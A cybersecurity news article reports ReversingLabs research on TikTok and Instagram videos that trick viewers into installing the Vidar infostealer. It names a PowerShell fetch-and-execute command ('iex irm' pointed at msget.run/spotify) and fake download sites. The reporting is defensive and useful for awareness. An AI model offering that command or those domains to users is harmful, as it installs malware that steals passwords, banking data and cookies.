Scammers are using a new method to trap social media users by hiding malicious files inside short videos. Threat intelligence firm ReversingLabs found that hackers are exploiting TikTok and Instagram Reels to distribute Vidar infostealer.
These campaigns are different from standard phishing emails containing infected links, as these manipulate social media platforms to make malicious content go viral.
This trick relies on tutorial-style videos that promise free access to paid applications like Spotify Premium or Microsoft Word. Scammers have ensured the clips look professional, using clear graphics and automated voiceovers to establish authority.
Turning commands into traps
In one identified technique, scammers create accounts with usernames like windows.tips, using a blue and white crown logo that mimics the official Windows icon. The videos instruct viewers to open PowerShell on their Windows computers and type in a specific command: iex irm.
This deceptive instruction tells the OS to quietly connect to a remote server to fetch and execute a malicious payload. For example, users are told to direct the tool to a domain called msget.run/spotify, and since the video appears safe, they run the code without checking what’s being downloaded.
A TikTok Video tricking users into following malicious commands and infecting their devices with malware (Source: ReversingLabs)
“Social media users executing this command may trust the video on face value, without verifying what is being downloaded,” ReversingLabs researcher Zaria Vuksan noted in the blog post shared with Hackread.com.
The second strategy targets user curiosity through casual clips. Scammers post videos showing off premium app features over trending background music and encourage viewers to comment with words like ok to learn the secret.
Once a user replies, the hacker sends a direct message directing them to fake download sites like d4ug.site, which claims to unlock premium games and AI tools but actually redirects victims to dead-end surveys or malicious links.
The viral delivery system
According to ReversingLabs’ analysis, these videos succeed by gaming platform algorithms. Recommendation systems heavily favour content that users save or share. Given that people prefer to save tutorials to check later, the system sends these clips to wider audiences, researchers explained, noting that one of the videos tracked during the investigation received 109,000 views, 1,699 saves, and 974 shares.
Upon following the instructions, a file named build.exe drops onto the user’s computer, which contains Vidar Infostealer. It is a widely used information-stealer sold on underground marketplaces as a malware-as-a-service (MaaS) model.
Cybercriminals can buy a lifetime license for 300 dollars to steal all kinds of data, including passwords, banking data, and browser cookies. Vidar infostealer was updated recently to make it much more stable and better at evading automated security filters.
Defending against these campaigns is difficult because hackers can delete warning comments left by past victims. ReversingLabs reported the scam accounts to Instagram, but the platform rejected the alerts.
Researchers are now urging users to avoid entering untrusted commands into terminal utilities, and businesses must train staff to spot scams hiding on consumer social feeds. Being prepared is the ultimate defence in this case.
“There are likely many more variations of videos with the same intentions. People are looking for scams in their email inboxes and text messages, but not as much on their social media feeds. Especially when these posts are under the guise of being helpful, rather than the urgency or sob stories associated with stereotypical phishing attempts. These videos can pop up at any time, so it is important that organizations stay prepared,” researchers concluded.
